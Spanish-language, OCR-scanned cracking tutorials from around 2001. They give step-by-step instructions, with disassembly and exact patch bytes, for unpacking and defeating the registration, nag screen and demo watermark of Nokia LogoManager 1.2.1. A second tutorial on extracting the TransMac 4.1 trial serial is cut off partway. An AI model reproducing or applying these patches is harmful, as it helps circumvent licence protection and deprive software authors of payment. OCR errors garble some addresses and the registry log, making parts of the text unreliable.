Muy bien ya hemos encontrao el dichoso salto, Apuntad y guardar bien la direccion a la que va el salto que lo utilizaremos 
luego. 
Lo siguiente a hacer es crear el Bucle Infinito, que es muy sencillo: 


Escribid a 0043FDF7 para editar; Ahora escribir JMP ElP + enter y tendreis que poner 3 NOPs ya que al codificar JMP ElP 
se utilizan menos bytes. 
Pues ya tenemos nuestro Bucle infinito echo, ahora pulsamos F5 y volvemos a windows (El bucle sigue ejecutandose) 


El ultimo paso es Dumpear asi que abrimos ProcDump y en TASK (procesos activos) elegimos nuestro ejecutable con el 
boton derecho y le damos a Dump (full) y guardamos el ejecutable donde queramos. 


Pues ya tenemos nuestro ejecutable desempakado :) lo vamos a probar y........ ¡no funcional! 
No os preocupeis ya que falta el ultimo toque final. 


Ahora es cuando hase falta el OEP :) recordamos que en este caso era 00426284 , nuestro ejecutable se cuelga porque 
tiene puesto el EntryPoint por defecto que no coincide con el que tenia que ser asi que vamos a cambiarlo :) 


Primero vamos a calcular el OFFSET del Punto de Entrada, Abrimos el ejecutable sin descomprimir con el ProcDump / PE 
Editor y apuntamos Imagebase en este caso 00400000. 


El OFFSET se saca mediante la siguiente formula : OEP - ImageBase = OFFSET 


00426284 - 00400000 = 00026284 


Bueno abrimos el ejecutable descomprimido con el ProcDump / PE Editor y en EntryPoint ponemos 00026284: 


PE Structure Editor 


Header Infos Structures Editor 
Entry Point: [00026284 Sections Directory 
Size of image : [00041 000 |; Apply changes method : 


( Only to PE header 


€ ToPE file Cancel 


Bueno pues probamos otra vez a ver si ahora hay suerte y funciona. Lo ejecutamos y funciona a la perfeccion :) . Ya lo 
hemos descomprimido. 
¿A que no ha sido tan dificil? 


Image Base : [00400000 


Si te interesa este tema te recomiento estos tutoriales 


Titulo Autor URL 
Descabezando archivos Ejecutables AUMIT or http:/welcome.to/karpoff 
Portables a 
PATCHING Encrypted or packed targets —macilaci  fravia's page of reverse ingeneering 
UPX unpacking tutorial ¿? http://www.inmortaldescendents.com 
ASPack v1.083 Volatility  http://www.inmortaldescendents.com 


Si os queda alguna duda, quereis colaborar (estaria muy bien), quereis ponerme a parir o simplemente habeis leido este tute 
y pensais que no esta mal escribidme un mail a rulzaz(Wpunkass.com que se agradece mucho. 


5 - Saludos 


A Mr.Silver y [thEpOpE] por ayudarme tanto. 
A Karpoff por publicarme los tutes. 
Atodos los crackers y grupos Hispanos. 
A la gente de los canales ttCrackers y HAtRiO del Irc-hispano. 


- —-=> RuL 2k01 - Http://kickme.to/rulcrk - rulzgzfpunkass.com <=-- -— 
[EOF'] 
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CRACKER: 


Karpoff Spanish Tutor 1999-2001 
LogoManager 1.2.1 


Empacado (UPX), Nag, y "DEMO" por tos lados 
Simular Estar Registrados 


PIDIO 


intermedio 


http://www.logomanager.uk.com 


ProcDump,Sice,W32dasm,Editor Hex. IAT Reconstructor y Regmon (Opcionales) 
KIDD FECHA: 18/11/2001 


INTRODUCCION 


Bienvenidos a mi 50 tutorial (creo). El prorama víctima de hoy es el Famoso editor de logos y demas 
tonterías para los nokia "Nokia Logomanager" El programa en si esta curradillo por el hecho de que puede 
editar imagenes .bmp y te las pasa al formato de logo. Para enviarte el logo al movil puedes hacerlo por IR o 
bien por cable, si no tienes nada de eso te tendrás que buscar un amigo con Infrarojos y mandarlo a través de 
su movil (que también se puede) 


La protección de este programa es un tanto chunga, o sea que no voy a explicar cosas básicas p.ej. como 
cambiar un byte o cosas así. 


Instalamos el programa y lo ejecutamos... ops! 


1.-Hay una nag screen muy "mona" que nos esta tocando los webos cada vez que cargamos el programa. 


2.-No nos deja guardar los logos en formato .ngg 


3.-Vemos un Unregistered en la parte inferior y en el "about". 


4.- En nuestros Logos vemos en la esquina izquierda algo tan molesto como la palabra DEMO recordándonos 
lo que ya sabéis: APAGAR! 


AL ATAKE 


UPX al descubierto 
Bien, el programa está empacado con el UPX 1.01. Esto se merece una descompresión manual ;) 


Primero, tal y como vimos en el Artemis Crackme cambiaremos los flags de las secciones a E0000020 para que SICE salte en el 
punto de entrada del progama, con cualquier editor PE (procdump, pojemplo). 


La mayoría de empacadores (y UPX no es una excepción) usan en sus desempacados las funciónes pushad (60h) en el principio 
y popad (61h) al final de la rutina de descompresión. Vamos ahora a buscar donde hay el 61 (popad) más proximo para saber 


donde se acaba la descompresión y hay el salto hacia el OEP (Original Entry Point). 


Abrimos el Programa con el Loader de Soft-Ice y justo en el principio del programa buscamos un POPAD mediante el comando 
Ss. 


s 4880A1 1 ffffff 61 ======> SICE buscara en ffffff a partir de 4880A1 un 61h 
cuando encontramos el popad la ventana de datos se nos irá a la direccion del popad. 


desactivamos el breakpoint que teniamos en el bucle y ponemos uno en el popad (:004881F7). Pulsamos FS5 para salir de Soft- 
Ice y SICE nos rompe de nuevo en : 


004881F7 popad ==>rompe aquí 

004881F8 ¡mp 43A573. ==> salto al OEP 

Una vez estamos en 4881F8 cambiamos el salto a un bucle infinito: 
a <intro> => Para editar en ASM 

jmp eip <intro> => Crea un bucle infinito 

Esc <intro> 

FS <intro> 


Luego abriremos el ProcDump, seleccionamos la tarea (logomanager) con el botón derecho, pulsamos Dump (Full) y le 
escogemos un nombre(Logomanagerdumped.exe). 


Ahora cerramos el logomanager con Kill task de ProcDump y abrimos el Logomanagerdumped.exe con el PE editor del 
ProcDump, cambiamos el OEP por el auténtico mediante la simple formula: Entry Point = OEP - Image base 


Así queda el Entry point en 3A575. 


Parcheando la nag 


Esta nag screen se las trae: no queda delatada a través de ninguna string reference ni pica con los breakpoints más típicos. Lo 
único que pude hacer para evitarla es pillarla por los mensajes de windows (Nunca falla ;). Si no tienes ni idea de como 
funciona esto de los mensajes te recomiendo que leas el tuto que hizo Dek_OI1N sobre las nags donde se explica BIEN todo eso 
de los mensajes de windows. 


Abrimos el programa y cuando sale la nag entramos en soft-Ice (Ctrl+D) escribimos task y pulsamos enter. Entonces nos 
aparecerá una lista con todos los procesos activos en este momento. Anota entonces como llama al que nos interesa: 
"logomana". Justo después pon el comando hwnd logomana y te saldrán todas las ventanas y ventanitas que estan en este 
momento en logomanager. Tienes que fijarte en las que pone +*Dialog en Class_name: Una de ellas se ven 3 tonterías (Button, 
Button, Button y Static) y en la otra se ven infinidad de cosas debajo suyo. Nos centraremos pues en la pequeña (que es la que 


nos interesa) y nos fijaremos en su handle (en cada ejecucion en handle es diferente) y en el SICE mismo teclearemos: 
bsmg <handle> wm_destroy 


salimos del SICE y cerramos la ventana cuando el boton para hacerlo se habilite. Entonces el SICE peta y pulsamos F12 unas 
cuantas veces para ir donde el programa llamó a la ejecucuión de esta nag (imaginamos que en la registered no saldrá esta nag), 
es decir, cuando en la parte inferior del SICE entre el codigo ASM y la ventana donde introduces comandos ponga algo como 
logomanagerdump!XXXX. 


:00410A11 A160614400 mov eax, dword ptr [00446160] 

:00410A 16 68 FFFFO0OOO push OOOOFFFF 

:00410A1B 85CO0 test eax, eax 

:00410A1D 6A00 push 00000000 

:00410A 1F 744F je 00410A70 => En caso de efectuarse el salto, evitamos la nag 
:00410A21 8B4624 mov eax, dword ptr [esi+24] 

:00410A24 8B0DD0294500 mov ecx, dword ptr [004529D0] 

:00410A2A 6800E54000 push 0040E500 

:00410A2F 50 push eax 


* Possible Reference to Dialog: DialoglID_00A1 
| 

:00410A30 68A 1000000 push 000000A1 
:00410A35 51 push ecx 

:00410A36 E875090200 call 004313B0 => llama a la nag 
:00410A3B 83C418 add esp, 00000018 
:00410A3E 48 dec eax 

:00410A3F 741A je 00410A5B 

:00410A41 83E802 sub eax, 00000002 
:00410A44 7544 jne 00410A8A 

:00410A46 8B5624 mov edx, dword ptr [esi+24] 
:00410A49 6A01 push 00000001 


* Possible StringData Ref from Code Obj ->"Registering/Order.html" => Sea lo que sea, no puede ser bueno... 


| 
:00410A4B 68786D4400 push 00446D78 


Nos tenemos que centrar en la parte del salto que viene determinado por el valor de eax (que se ha inicializado en :00410A 11) 
asi pues, se ve claramente que dependiendo del contenido que hay en [00446160] el salto se efectuará o no . Esto se puede hacer 
con SICE poniendo un bpx en :00410A11 y entonces d 00446160 para que en la ventana de datos se muestre el valor que 
contiene (1). Si en W32Dasm miramos en la misma dirección podemos ver que el valor sigue siendo 1, o sea que si cambiamos 
este 1 por un O mediante un editor hexadecimal la nag no aparecerá... 


Coño! Sin saber como el valor 01 se ha restaurado en la dirección 00446160! Vamos a machacarlo*: Ejecutamos el Loader del 
SICE y abrimos logomanagerdumped. Cuando SICE nos pete al principio del programa ponemos lo siguiente: 


bpm 00446160 w para que SICE nos avise cuando se sobreescriba encima de esta dirección. 


Cuando Soft-Ice nos peta en nuestras narices nos encontramos en estas líneas: 


:0040C3DB 33C0 xor eax, eax 

:0040C3DD 3BF3 cmp esi, ebx 

:0040C3DF OF94CO sete al => esto ha puesto un 1 a eax 

:0040C3E2 A360614400 mov dword ptr [00446160], eax => coloca el 1 en 446160 
:0040C3E7 8B44241C mov eax, dword ptr [esp+1C] => Caemos aquí 

:0040C3EB 50 push eax 


:0040C3EC 8B08 mov ecx, dword ptr [eax] 
Para evitar esto lo único que debemos hacer es invertir el sete (0F94C0) a setne (OF95C0). Ahora sí...... NAG MUERTA! 


*Lo más fácil para evitar la nag screen sería cambiar el salto pero es mejor cambiar variables ya que puede que la misma 
variable se use para diferentes comprovaciones 


Unregistered? 


En la parte inferior de la ventana vemos el mítico texto "Unregistered". Esta parte no es excesivamente difícil ya que solamente 
tenemos que abrir nuestro programa desempakado con un desensamblador y buscar la stringReference* "Unregistered". 
Encontramos repetida 2 veces esa string pero se ve claramente que la primera no nos interesa para nada. Centremonos pues, en 
la segunda: 


*si no te salen ni imported functions ni String References en tu listado muerto usa programas del tipo IAT Reconstructor (Thnx 
Meta). 


:00411B8F A100C04500 mov eax, dword ptr [0045C000] => Variable que determina si se muestra "Unregistered" 
:00411B94 85CO0 test eax, eax => Si eax (valor de 45C000) es 0 la flag Z se activa. 

:00411B96 B8BC244500 mov eax, 004524BC 

:00411B9B 7505 jne 0041 1BA2 => Salto que determina si se muestra o no la palabra unregistered (si la flag Zero NO está 
activada salta) 


* Possible StringData Ref from Code Obj ->"Unregistered" 


| 
:00411B9D B870704400 mov eax, 00447070 


Vamos a hacer lo mismo que antes para saber qué se halla en la dirección :0045C000 aunque podríamos hacerlo también 
mirando nuestro listado muerto o con una simple deducción y un poco de ASM: 


Corremos el programa con un bpx en 00411b8f y cuando el SICE nos pete en las narices miramos el valor de 45C000 mediante 
d 45C000 y vemos que hay un fantástico 00 que si lo cambiamos (mediante un editor hexadecimal) por un 01 evitará que se 
muestre el "Unregistered" y algunas cosillas más. Alguno de vosotros podría pensar: Y porqué no cambiamos el salto y listos? 
La respuesta es sencilla:si sólo cambiamos el salto evitamos que se muestre el "Unregistered" pero, por ejemplo, el programa 
sigue sin dejarnos grabar logos en formato .ngg 


Si miramos en el about veremos que se sigue mostrando la famosa palabra. La manera más sencilla de evitar esto es buscar la 
cadena Unregistered en ASCU dentro del ejecutable (en Unicode) y cambiarlo por lo que se os antoje pero sin pasaros del 
numero de letras que tiene la palabra Unregistered. Yo cambié 


U.n.r.e.g.1.s.t.e.r.e.d. | por CASES .E.C.C. 


Esto sería el procedimiento "cutre" para olvidarte de la palabra "Unregistered" pero si realmente quieres que el programa te 
reaccione como si estuvieses registrado realmente suda de esta sección y espera a después (sección Rizando el rizo) donde veras 
más bien como funciona eso. 


DEMO 


Lo más difícil de esta protección llega ahora. El modo que usaremos para quitar del medio la palabra DEMO digamos que es 
"diferente" a lo común. 


Primero busqué la palabra DEMO como un loco En todas la String References y toda búsqueda fue en vano. Luego con un 
editor de recursos miré a ver si se trataba de un bitmap que se colocaba o no en función de si uno estaba registrado o no pero 
nada de esto.... 


Para empezar abriremos el logomanager y guardaremos un logo vacío (sólo con la palabra obligada) con nombre xxx.nlm. Una 
vez guardado lo abriremos con un editor hexadecimal (yo uso hex workshop) y miramos su contenido 


MK demo.nim (Ox 


00000000 4E4C 4D20 0100 0048 OE01 CEA4 0000 0000 NLM ...H........ 
00000010 0000 0048 EA00 0000 0000 0000 ACAA DODD .......oooooo.... 
00000020 0000 0000 00A8 4400 0000 0000 0000 CEA4 ......oooooo.... 
o0000030 0000 0000 0000 0000 0000 0000 0000 DODO ......oooooo..... 
00000040 0000 0000 0000 0000 0000 0000 0000 DODD ........o....... 
00000050 0000 0000 0000 0000 0000 0000 0000 DODO ......oooooo.... 
00000060 0000 0000 0000 0000 0000 0000 0000 DODO ......oooooo.... 
00000070 0000 0000 povoo 0000 0000 0000 0000 0000 .....oooooo.oo... 
00000080 0000 0000 0000 DODO. oo o. ...ooo. 


Vemos que casi todo son ceros excepto al principio, el tipo de archivo (NLM) y los bytes 
CEA4.....ASEA.....ACAA....ASAA.....CEA4. Estos bytes, pues son los que traducidos a logo muestran la palabra DEMO, pillas? 
así pues buscaremos estos bytes en el ejecutable ya que para insertarlos en los logos tiene que conocer estas posiciones. 


Si buscamos en el ejecutable desempacado el la cadena CEA4 vemos que solo hay 2 entradas. Estaremos en el buen camino? 
Sllahora miramos el offset en que se encuentra el primer CEA4 y vemos que esta en el offset 472BCh ahora podemos mirar que 
dirección del programa corresponde a ese offset (eso se puede hacer con el W32Dasm o con progs como el KrackPE) y vemos 
que es la dirección 447CBC. 


Así pues ya sabemos lo que hay que hacer: 
bpm 447cbc r para poner un breakpoint cuando se lea lo que hay en dicha dirección. 
y arrancar el programa, pintar algo y......POP! 


:00417513 8808 mov byte ptr [eax], cl 

:00417515 A12CA04500 mov eax, dword ptr [0045A02C] =>Valor determinante de la escritura de "DEMO" 
:0041751A 85C0 test eax, eax 

:0041751C 7543 jne 00417561 => Salto determinante 

:0041751E 33C9 xor ecx, ecx 

:00417520 B8BD7C4400 mov eax, 00447CBD 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:0041755F(C) 

:00417525 8B561C mov edx, dword ptr [esi+1C] 

:00417528 8BBE60010000 mov edi, dword ptr [esi+00000160] 
:0041752E 83C203 add edx, 00000003 

:00417531 SAS8FF mov bl, byte ptr [eax-01] => eax-01 contiene el principio de "DEMO" y lo pasa a bl 
:00417534 83E2FC and edx, FFFFFFFC => Caemos aquí 

:004175337 83C002 add eax, 00000002 

:0041753A OFAFD1 imul edx, ecx 

:00417540 8B561C mov edx, dword ptr [esi+1C] 

:00417543 83C203 add edx, 00000003 

:00417546 SAS8FE mov bl, byte ptr [eax-02] 

:00417549 83E2FC and edx, FFFFFFFC 

:0041754C 8BBE60010000 mov edi, dword ptr [esi+00000160] 


:00417552 OFAFD1 imul edx, ecx 

:00417555 41 inc ecx 

:00417556 3DC97C4400 cmp eax, 00447CC9 

:0041755B 885C3A01 mov byte ptr [edx+edi+01], bl 

:0041755F 7CCA jl 00417525 => Si todavía no ha acabado de copiarlo todo vuelve "parriba" 


En 00417515 miramos el valor de [0045a02c] y vemos que es un O seguramente cambiandolo por un 1 se aclarará la cosa.... Pues 
NO! Este Mike Bradley se lo ha currado más y ha puesto comprobaciones suplementarias que vienen dadas por variables 
distintas....... 


ZENNNNN....... ZENNNNN..... Pensemos un poquito en vez de ir como locos al código: si nosotros intentamos borrar el DEMO 


y se vuelve a escribir EN EL MISMO SITIO, que podemos hacer para enganchar al programa mientras escribe en la pantalla? La 
solución está en 


:0041753D 881C3A mov byte ptr [edx+edi], bl => Escribe bl en la pantalla 


Para pillar al programa escribiendo miramos que hay en la dirección [edx+edi] (En cada ejecución la dirección varia) y le 
ponemos un bpm en escritura (bpm 81BE0B2C w) entonces vemos que SICE nos peta en diferentes lados, Uno en el mismo 
sitio de antes...pulsamos F5 y SICE nos vuelve a petar y vamos analizando mediante backtrace a ver que variables hay que ir 
cambiando, el problema es, si a cada inicio de sesión el programa corrige esos bytes si los hemos modificado, como podemos 
pillalo en bragas? Pues muy facil, con un bpm de escritura en alguna de estas direcciones que aunque cambiemos con el editor 
hexadecimal el prog. restaura. Probemos con bpm 0045A02C w y veremos que ahí se no s hace la luz: 


:00428957 8BC7 mov eax, edi 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:004277BA(U) 


:00428959 3BC3 cmp eax, ebx => ebx contiene O 

:0042895B A32CA04500 mov dword ptr [0045A02C], eax => Pasa eax a una variable determinante 
:00428960 7421 je 00428983 => según lo que había en eax continua el proceso de registro 

:00428962 B901000000 mov ecx, 00000001 => (Sobran explicaciones) 

:00428967 891D60614400 mov dword ptr [00446160], ebx => Pasa ebx (0) a una variable determinante 
:0042896D 3BC1 cmp eax, ecx => El prog se asegura otra vez de lo que hay en eax 

:0042896F 890D0C864500 mov dword ptr [0045860C], ecx => Pasa ecx a una variable determinante 
:00428975 890D00C045300 mov dword ptr [0045C000], ecx => Pasa ecx a una variable determinante (te suena esa dirección?, 
mira más arriba del tutorial) 

:0042897B 7406 je 00428983 

:0042897D 891DD8294500 mov dword ptr [004529D8], ebx 


Vemos que aqui se les asigna valor a unas cuantas variables (algunas de ellas ya las hemos tratado pero ez iguá) y podemos 
trastear un poquito para que este código juegue a nuestro favor modificando la linea anterior 


| :00428957 8BC7 mov eax, edi 
| por 


:00428957 B001 mov al, 01 


Así podemos comprovar ( al decir que podemos comprobar me refiero a que lo comprovéis por vuestra cuenta y entendáis el 
porque y no que sudéis de mirarlo más) que las variables se van asignando ellas solitas al numero correcto. 


Alguien puede estar pensando:- Y porque me he matado a sacar lo de Unregistered si con esto ya se solucionaba? La respuesta 
es: Porque hasta el final del tuto no me percaté de que había un sitio donde se solucionaba este problema y además aki se va a 


aprender a hacer cosas y no a robar programas, si no quieres trabajo bajate el keyfile de porahí, te registras con tu nombre y listo! 


Rizando el rizo 


Una vez sacada la palabra DEMO del medio ya no nos queda ningún símbolo de Unregistered pero.... cuando cargamos el 
programa nos sale la nag de usuario registrado pero no sale ningún nombre.... Habéis oído hablar de un programa llamado 
Regmon (http://www.sysinternals.com)? Espero que sí porque ahora lo vamos a usar para averiguar donde se gurda el nombre de 
usuario. 


El proceso es sencillo y el programa más. La cuestión es abrir el Regmon (con filtros si sabéis y si no no pasha nada) y luego 
abrir el logomanager y checkear las cosas que busca el prog en el registro hasta localizar una llamada Username (5_=) nos 
vamos a aquella entrada del registro, doble cilck y se nos abre el regedit.exe o puedes hacerlo también con el regview (pilla mi 
tutorial de cracking Regview y si te mola, te lo pillas i practicas) y pones tu nombre, sales 


Registry Monitor - Sysinternals: www. sysintermmals.com 
File Edit Options Help 


JU ADE 97? M8 


211 3.68407440 Logodump — Queryvalue... HKLMiSoftwareMike Bradley*LogokM anagerTumároundDelay SUCCE... 19000 


212  3.68409520 Logodump — Queryvalue... HKLMi Software Mike Bradley!Logokm anageriLinkTimeout SUCCE... 4000 

213 368411920 Logodump — QueryWYalue... HKLMA Software Mike Bradley LogokM anagerSpeedLimit SUCCE... EF6E10 
214  3.68414160 Logodump — Queryalue... HKLMiSoftwareMike BradleytLogoManagerLocale SUCCE... 7261 696D 
215 358416720 Logodump — QueryValue... HKLMiSoftware.Mike Bradley!LogoManager'AutoNetwork SUCCE.. 1000 

216  3.68418400 Logodump — Queryvalue... HKLMiSoftwareMike Bradley! Logo anagerLUserPort SUCCE... "COM2" 
217  3.68420000 Logodump — QueryYalue... HKLMA Software Mike Bradley LogomanagerIRPort SUCCE... "COM2" 


218 —3.68421760 Logodump — Queryalue... HKLMi Software Mike Bradley*LogokManager CustomCountrClode SUCCE... "214" 

219 3658423520 Logodump — QueryWYalue... HKLMi Software Mike Bradley Logo anageriCustomCountyName SUCCE... "Spain" 

220  3.68425200 Logodump — QueryWYalue... HKLMA Software Mike Bradley LogoManagerCustomNetCode SUCCE... "214 07" 

221 358426880 Logodump — Queryalue... HKLMiSoftwarerMike BradleyrLogoManager CustomNetName SUCCE... "MOVISTAR" 


222. 3.568433680 Logodump — QuerYalue... HKLMiSoftwareMike BradleyhLogoManagerColumnSizes SUCCE... 5564 2D 41 1E 
4:223 358435360 Logodump QueruYalue... HKLMi Software Mike Bradley Loqokm anagert Username SLUCEE 00 

224 3658437040 Logodump — QueryYalue... HKLMiSoftwaretMike Bradley LogoManager Password SULCEE.... 

225  3.68438880 Logodump — Queryalue... HKLMi Software Mike BradleyLogokM anagerlMessageCentre SUCCE... "" 

226  3.58440560 Logodump — QueryWalue... HKLMiSoftwarerMike Bradley, LogoManagertInstallation|D SUCCE... "xuxbtpjd" 

227  3.68442240 Logodump — Queryvalue... HKLMiSoftwareMike Bradley! Logo anagerLastNumber SUECE... *” 


228 — 3.58444000 Logodump — QueryWalue... HKLMiSoftwareMike Bradley Logo anagerLastPhonelmage SUCCE... "8210.bmp" 
229 —3.71501200 Logodump — Queryalue... OxC189C5001C:ARAIMONNMogomanagerl.20Logomanagerilogo... NOTFO... 

230 373354880 Logodump  OpenKey HKCRACLSID: (EE60BD45-331F-11D5-82CC-080046064FB0) SUCCE... hKey: 0xC6948! 
231 373358480 Logodump  QuerYalue  HKCRACLSIDM(E660BD45-331F-11D5-82CC-080046064FBO MT re... NOTFO... 


aan AROORNANN cn 1. MAA IA SOON AAA ANO NAO NOANOAONOA AA ta pl 


El proceso es sencillo y el programa más. La cuestión es abrir el Regmon (con filtros si sabéis y si no no pasha nada) y luego 
abrir el logomanager y checkear las cosas que busca el prog en el registro hasta localizar una llamada Username (=_=) y otra 
Password, nos vamos a aquella entrada del registro, doble cilck y se nos abre el regedit.exe o puedes hacerlo también con el 
regview (pilla mi tutorial de cracking Regview y si te mola, te lo pillas 1 practicas) y pones tu nombre, y lo que quieras como 
pwd, sales y listo! 


Para que en la pantalla del About no te muestre lo del Unregistered vamos al desensamblado y vemos una string reference que 
pone "Internet Release - Registered" que se parece mucho a lo que nos salia a nosotros: 


* Referenced by a CALL at Address: 

|:0040DE68 

| 

:0040DD30 56 push esi 

:0040DD31 57 push edi 

:0040DD32 E839D5FFFF call 0040B270 => Llamada determinante 
:0040DD37 85CO0 test eax, eax 

:0040DD39 744E je 0040DD89 

:0040DD3B 8B74240C mov esi, dword ptr [esp+0C] 


* Reference To: USER32.USER32.dll, Ord:0000h 


| 
:0040DD3F 8B3D40234400 mov edi, dword ptr [00442340] 


* Possible StringData Ref from Code Obj ->"Internet Release - Registered " 
->"to:" 


| 
:0040DD45 68586B4400 push 00446B58 


Miramos en :0040DD32 y encontramos 


* Referenced by a CALL at Addresses: 
1:0040DD32 , :0040F955 , :00410C79 


| 
:0040B270 B894140000 mov eax, 00001494 


Como vemos que se llama tres veces a esta dirección vamos a currarnos una modificación valida para las tres: Vamos a ponerle 
un parche para que siempre devuelva un 1. El sistema es fácil: Cambias la dirección 0040b270 por mov al,01 seguido de un ret: 
B0 01 C3 y yasta! 


PROGRAMA CRACKEADO. 


Nota Final: Ahora te tienes que currar un loader o un inline patching que yo, por supuesto no te voy a explicar porque me duelen 
las manos de tanto escribir. 


[FINALIZANDO 


Bueno, hemos visto que este programa tenía una protección un bastante "abrupta" (para mi muy abrupta) pero, sin embargo 
hemos podido petarla sin tener puta idea de keyfiles. Esto ha sido la proteción más chunga que he conseguido petar hasta el 
momento pero continuaremos trabajando. 


Básicamente ha sido un tutorial chapuza pero que nos muestra muchas cositas distintas: como petar una nag (sea cual sea), editar 
texto en ASCII..... que nos pueden ayudar en otros casos. Espero que hayáis disfrutado tanto como yo al crackear este programa 
que, por cierto, me merece un aplauso acerca de su protección. Ya sabéis, dudas, suggerencias, erratas, lo que queráis: kidderack 


( hotmail . com. 


Quiero agradecer/saludar a toda la peña se curra tutoriales INTERESANTES y que se esfuerza para que los newbies podamos 
aprender. 


Deseo mandar un saludo a toda la peña de ttcrackers del IRC, desde los más newbies a los más jefes. 


Un saludo también a todo ECC!!! 


Aviso Legal: El contenido expuesto en este site es sólo y únicamente para uso educativo. ECC no se hace responsable del mal uso que se le puedan dar a los 
documentos y/o herramientas que se exponen en este site. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 


DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 


TRANSMAC V4.1 


Serial de un trial de 60 días empakado con '"Shrinker 3.algo"'. 
Conseguir un ejecutable funcional debidamente registrado. 
Utilidad para acceder a sistemas de archivos MAC. 
Avanzadillo. 


http://www.asy.com/sharetm.htm 


Softice 3.24, R!SC Process Patcher, Procdump32, File InsPEctor XL, PuPE, ExeScope 6.0, 
un editor Hexadecimal. 


Arkanian FECHA: 22/09/2001 


INTRODUCCION 


Un complejo programa con una protección un tanto compleja. Lo de "Shrinker 3.algo" lo pongo porque File 
InsPEctor XL identifica el compilador como Shrinker 3.4 con una probabilidad del 66.3% (heurística). O sea 
que tenemos un 33.7% de "algo" más... 


De hecho la cadena Shrinker 3.4 aparece por todos los lados, se cargan módulos con ese nombre, se crean 
archivos temporales, un Shrinker34.1dr dando vueltas por la memoria, etc... 


Un desempakado "automático" con Procdump se cuelga y haciendolo manualmente no obtenemos un 
resultado satisfactorio, es más, no funciona. 


¿Por que?, ...porque nos falta "algo" :-) 


He dividido este tutorial en dos partes. Una primera parte donde veremos como pillar el Serial y como 
cargarlo con el R!SC Process Patcher y una segunda parte donde desempakaremos totalmente el programa e 
introduciremos "a mano" el Serial. 


Dos maneras diferentes de llegar al mismo objetivo. 


Vamos alla... 


AL ATAKE 


PARTE I 
CAZANDO EL SERIAL 


Durante la instalación se nos pide un Nombre de Usuario y un Número de Serie, una rápida investigación con el Sice y 
descubrimos que esto no nos lleva a ningún sitio, bueno si, a la creación de un archivo llamado Transmac.ppp que es 
donde se almacenan las opciones de configuración del usuario, tamaño del buffer, Unidades disponibles, etc, ...pero de 
comprobaciones nada. El par User-Password simplemente se guarda ahí. Hay que señalar que este archivo aparece 
cuando se cierra el programa. (BPX WRITEFILE) 


Iniciamos el programa y una horripilante ventana nos muestra un contrato de Licencia donde se nos recuerdan los 60 
días de prueba, las limitaciones, el copyright y varias cosas más. Aquí ya tenemos un botón de Register, empezamos... 


De entrada un BPX HMEMCPY a ver que pasa... rellenamos las casillas con nuestro nombre y un número cualquiera 
(1234567890) y cuando rompa el Sice comprobamos que en el REPZ MOVSD se está leyendo el Nombre, le damos al 
FS, comprobamos que lo siguiente sea el Serial de prueba, quitamos el bp y le damos al F12 las veces oportunas para 
salir al código real. Este es el código: 


:0040C49B FED? call edi -> LLamada a GetDlgltemTextA. 

:0040C49D E84EFEFFFF call 0040C2FO0 -> Salimos aquí. 

:0040C4A2 68B4A54200 push 0042A5B4 -> Dirección donde está el Nombre. 

:0040C4A7 E804010000 call 0040C5BO -> Larga encriptación del Nombre. 

:0040C4AC 68A0A54200 push 0042A5A0 -> Dirección de nuestro Serial de prueba. 

:0040C4B1 E82A010000 call 0040C5E0 -> Manipulación y transformación del Serial de prueba. 
:0040C4B6 83C408 add esp, 00000008 


Parece que no hemos acertado, el Serial tiene un número concreto de caracteres: 


:0040C618 33C0 xor eax, eax 

:0040C61A C644140400 mov [esp+edx+04], 00 

:0040C61F E2 repnz 

:0040C620 AE scasb 

:0040C621 F7D1 not ecx 

:0040C623 49 dec ecx 

:0040C624 5F pop edi 

:0040C625 83F90C cmp ecx, 0000000C -> Esto son 12 en decimal. 
:0040C628 7512 ¡ne 0040C63C -> Nos saca fuera. 


Le ponemos un bp a 40C625, salimos, ponemos el número de caracteres adecuado (123 ... AB) y volvemos a entrar. A 
continuación viene una largísima manipulación del Serial, (el que quiera que se lo trace). Lo único que sacamos en claro 
de todo esto es que el Serial de 12 caracteres (31 32 33 ... 41 42) acaba encriptado en otro de 7 (19 C6 B9 5F BE 1C C6) 
en la dirección 42A1D4, vamos a poner un BPM 42A1D4 RW para ver cuando se produce la comparación: 


:0040D860 A0D7A14200 mov al, byte ptr [0042A1D7] -> El 4* caracter del Serial encriptado [SF]. 
:0040D865 83EC68 sub esp, 00000068 -> Corregimos la pila. 

:0040D868 84CO0 test al, al -> Comprobación. 

:0040D86A 56 push esi 

:0040D86B 57 push edi 

:0040D86C 7415 je 0040D883 -> ¿No es 00? 

:0040D86E ES4DFOFFFF call 0040C8C0 -> Comprobación del 8* caracter del Serial real [38]. 
:0040D873 33C9 xor ecx, ecx -> Despejamos ECX. 

:0040D875 SAO0DD7A 14200 mov cl, byte ptr [0042A1D7] -> El 4* de nuevo. 

:0040D87B 3BC8 cmp ecx, eax -> Comprobación. 

:0040D87D 0F8C3D010000 j1 0040D9CO -> Si el 8” real es mayor que el 4* encriptado nos saca fuera. 
:0040D883 AO0D4A 14200 mov al, byte ptr [0042A1D4] -> El primer caracter encriptado, aterrizamos aquí. 
:0040D888 8A0D785C4200 mov cl, byte ptr [00425C78] -> ¿Que hay aquí?, ¿A5S?. 

:0040D88E 3AC1 cmp al, cl -> La comparación. 

:0040D890 740C je 0040D89E -> Saltaríamos si fueran iguales. 

:0040D892 3A05C5A14200 cmp al, byte ptr [0042A1C5] -> Resultado transformación del Nombre [D2]. 


:0040D898 0F8522010000 jne 0040D9CO0 -> Directamente fuera. 


* Referenced by a (U)nconditional or (Cjonditional Jump at Address: 
1:0040D890(C) 


| 
:0040D89E 8A15D6A 14200 mov dl, byte ptr [0042A1D6] -> Tercer caracter. 


:0040D8A4 A0795C4200 mov al, byte ptr [00425C79] -> [46] = F 

:0040D8A9 3ADO emp dl, al 

:0040D8AB 0F850F010000 jne 0040D9C0 

:0040D8B1 AODAA 14200 mov al, byte ptr [0042A1DA] -> Septimo y último caracter. 
:0040D8B6 8A0D7A5C4200 mov cl, byte ptr [00425C7A] -> [52] =R 
:0040D8BC 3AC1 cmp al, cl 

:0040D8BE 0F85FC000000 jne 0040D9C0 

